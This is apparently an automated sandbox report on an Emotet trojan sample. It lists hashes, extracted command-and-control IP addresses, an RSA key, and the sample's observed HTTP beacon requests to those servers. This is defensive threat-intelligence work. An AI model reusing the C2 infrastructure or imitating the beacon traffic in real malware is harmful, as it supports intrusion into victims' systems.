Analysis

  • max time kernel
    109s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-07-2020 01:57

General

  • Target

    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe

  • Size

    100KB

  • MD5

    6ddb546eae9ff4664bc19c6af377353d

  • SHA1

    f255bdd6a038b7f9ae97747170dada6754e63da3

  • SHA256

    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89

  • SHA512

    fff63a2ff9aa4bfeeec35b350345bf7796db38310ca9b9336df4bd005b38b477d5f9e3d29d6a06aa9490541f215b84cf0c6597e76230cc924c65d44922079444

Score
10/10

Malware Config

Extracted

Family

emotet

C2

177.144.130.105:443

198.27.69.201:8080

157.7.164.178:8081

78.188.170.128:80

203.153.216.178:7080

77.74.78.80:443

178.33.167.120:8080

177.0.241.28:80

143.95.101.72:8080

51.38.201.19:7080

181.167.35.84:80

41.185.29.128:8080

192.163.221.191:8080

181.164.110.7:80

203.153.216.182:7080

80.211.32.88:8080

113.160.180.109:80

185.142.236.163:443

192.241.220.183:8080

87.106.231.60:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
3
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
4
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious use of SetWindowsHookEx 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    "C:\Users\Admin\AppData\Local\Temp\046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: EmotetMutantsSpam
    • Suspicious use of SetWindowsHookEx
    PID:672

Network

  • flag-unknown
    POST
    http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /PozeOi1T0cb/8ln6jjX6miWRur26H1P/ HTTP/1.1
    Referer: http://177.144.130.105/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    Content-Type: multipart/form-data; boundary=---------------------------756070110702999
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 177.144.130.105:443
    Content-Length: 4372
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-unknown
    POST
    http://77.74.78.80:443/dfkwbOy/GhbhZgL/
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    Remote address:
    77.74.78.80:443
    Request
    POST /dfkwbOy/GhbhZgL/ HTTP/1.1
    Referer: http://77.74.78.80/dfkwbOy/GhbhZgL/
    Content-Type: multipart/form-data; boundary=---------------------------135844738322007
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 77.74.78.80:443
    Content-Length: 4388
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 19 Jul 2020 01:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.130.105:443
    http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    http
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    5.3kB
    252 B
    9
    6

    HTTP Request

    POST http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
  • 198.27.69.201:8080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 198.27.69.201:8080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 157.7.164.178:8081
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 157.7.164.178:8081
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 78.188.170.128:80
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    3
  • 78.188.170.128:80
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    3
  • 203.153.216.178:7080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 203.153.216.178:7080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 77.74.78.80:443
    http://77.74.78.80:443/dfkwbOy/GhbhZgL/
    http
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    5.3kB
    988 B
    11
    10

    HTTP Request

    POST http://77.74.78.80:443/dfkwbOy/GhbhZgL/

    HTTP Response

    200
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 224.0.0.252:5355
    100 B
    2
  • 239.255.255.250:1900
    966 B
    6
  • 239.255.255.250:1900

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/672-0-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/672-1-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.